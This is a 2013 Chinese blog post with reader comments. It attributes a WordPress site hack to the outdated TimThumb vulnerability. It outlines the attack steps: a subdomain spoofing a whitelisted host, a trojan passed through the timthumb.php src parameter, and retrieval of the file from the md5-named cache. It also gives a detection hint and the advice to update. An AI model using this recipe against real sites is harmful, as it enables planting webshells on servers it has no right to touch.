timthumb漏洞导致的Silence Is Golden Hack

SilenceIsGoldenHack

demo站之前出的问题我实在是不服气, 今天跑上来检查了, 得出结论九成是timthumb漏洞导致的.

Timthumb漏洞已经出来许多年了, 老版本的Timthumb由于白名单域名过滤机制的不完善, 给了hackers绕过验证的机会, 所以被黑风险很大.

国外论坛上也有对这个老问题的讨论,

Are you using an outdated version for timthumb? So many wordpress sites are getting hacked cause of that. If I was you I would replace the entire website. Chances are almost every file has a backdoor. You basically need to reinstall everything.

20130816235512

某胖子大牛前年就写过一篇利用Timthumb漏洞hack的演示, 总结大概步骤是这样: 建立一个三级域名的网站,地址为http://白名单域名.你的域名 , 比如http://picasa.com.域名.com, 并上传一个自己的木马, 然后访问目标网站路径/timthumb.php?src=http://http://flickr.com.域名.com/木马.php, 这个时候并不能直接访问结果, 但结果已经保存在Timthumb的cache路径下了, 然后就可以在cache下得到md5值.

这个hack本身已经过期了, 但是如果使用了过期的timthumb插件就必然会被秒0了, 注意软件漏洞发布, 如果文件多出来eval(function(..之类的查询肯定是被黑了, 多留神吧

LIKE OR SHARE IT:

admin发表于Code目录下,标签为,转载请保留链接

«上一篇:
下一篇: »
TOP DOWN
发表评论

您必须 [ 登录 ] 才能发表留言!

  1. 沙 发 ai7hoo

    以前不注意安全问题,前段时间无聊查看之前做过的网站,好多eval的大马被挂到了网站上,还留了个友情检测的page,看到之后心里好不爽0.0

    八月 17, 2013 03:52:27
  2. 板 凳 kn007

    不是据说新版本已解决该问题?
    timthumb功能太多,单纯在生成和显示缩略图,自己写的生成缩略图函数。没有任何漏洞可言。囧。

    八月 17, 2013 07:33:29
  3. 地 板 跑调的包子

    支持小蝴蝶!!! V

    八月 17, 2013 08:58:42
  4. 地 毯 长安婚纱摄影

    来看看,支持博主,哈哈,小蝴蝶,这个名字真可爱。

    八月 17, 2013 11:18:24
  5. 地 面 大头蛋

    不明觉厉,demo站是哪儿呢 反正那个Octopress的博客目测是死了……

    八月 17, 2013 12:37:12
  6. 地 下 xsinger

    找到问题就好啊!别生气~

    八月 18, 2013 10:25:12
  7. 7 楼 Soar、毅

    大概明白了。设置目录权限不行吗?。

    八月 18, 2013 20:51:59
  8. 8 楼 空空裤兜

    这个问题当时良心的主题受灾比较严重

    八月 19, 2013 11:30:08
  9. 9 楼 胡倡萌

    虚惊一场,都是N久前的老版本Timthumb了

    八月 19, 2013 19:37:41
  10. 10 楼 Android

    老版本真V5….漏洞一堆…

    八月 19, 2013 21:16:51
  11. 11 楼 神父

    蝴蝶威武,追踪回去,反咬一口

    八月 20, 2013 00:06:40
  12. 12 楼 siniamei

    改好就没有问题了,不过现在不是有什么可以替代的软件吗?

    八月 20, 2013 16:53:04
  13. 13 楼 苏晓晨

    RICE原来是个胖子~

    八月 20, 2013 18:01:45
  14. 14 楼 Tokin

    有没有没漏洞的timthumb

    八月 21, 2013 08:50:55
  15. 15 楼 麦田一根葱

    自从这货上次被爆漏洞后,我就一直不用它了

    八月 21, 2013 18:28:17
  16. 16 楼 宝安婚纱摄影

    我是个看不懂代码的人

    八月 22, 2013 14:06:40
  17. 17 楼 干洗设备

    然后就可以在cache下得到md5值大家要小心啊

    八月 22, 2013 14:26:01
  18. 18 楼 长安婚纱摄影

    来看看。

    八月 22, 2013 14:29:59
  19. 19 楼 rainzee

    看不懂

    八月 22, 2013 15:18:04
  20. 20 楼 夜枫

    timthumb的漏洞更新就可以了,我在寻找一款和timthumb一样功能的,但是木有找到…

    八月 22, 2013 22:49:12
  21. 21 楼 灰狼

    木有缩略图插件,木有用WP,好像没担心过

    八月 23, 2013 15:58:32
  22. 22 楼 牧风

    老版本有问题, 记得是去年还是前年的事了

    八月 23, 2013 17:27:07
  23. 23 楼 郑永

    漏洞无处不在。。

    八月 23, 2013 17:53:35
  24. 24 楼 不亦乐乎

    没见你用这个程序啊。

    八月 24, 2013 09:14:47
  25. 25 楼 Aivier

    我觉得用不上缩略图这东西。。。欢迎回访

    八月 25, 2013 19:33:03
  26. 26 楼 Aivier

    评论分页的当前页数会戳入顶部导航

    八月 25, 2013 19:33:44
  27. 27 楼 G’s

    喜闻乐见,不用这个的。。

    八月 27, 2013 19:23:01
  28. 28 楼 东营期货开户

    小漏洞不管往往就会变成意想不到的结果,变成大的漏洞就不好了。

    八月 27, 2013 21:03:09
  29. 29 楼 近视眼怎么恢复

    看看,顺便学学

    八月 28, 2013 09:47:32
  30. 30 楼 佐仔

    更新速度比较更懒的MM加油了,追稿了。

    八月 30, 2013 11:01:58
  31. 31 楼 郑永涛

    我很喜欢你们啊~我觉得你们很可爱~

    八月 30, 2013 21:09:46
  32. 32 楼 郑永涛

    我很喜欢你们啊~我觉得你们很可爱~

    这个是我的部落格,大家有空可以看看啊~要翻墙哦~我是马来西亚人。

    八月 30, 2013 21:10:24
  33. 33 楼 郑永涛

    jonylifefighter.blogspot.com

    八月 30, 2013 21:10:41
  34. 34 楼 阿福

    曾经被这个漏洞啪啪啪了。。

    九月 4, 2013 20:51:26
  35. 35 楼 Cue

    女神,你好腻害..

    十月 25, 2013 23:14:40
  36. 36 楼 A.yi

    发现又换主题了 ~~

    十一月 14, 2013 12:52:01
  37. 37 楼 wordpress主题

    这文件搞的很多WPER都有心理阴影了。。。。。

    一月 31, 2014 22:02:05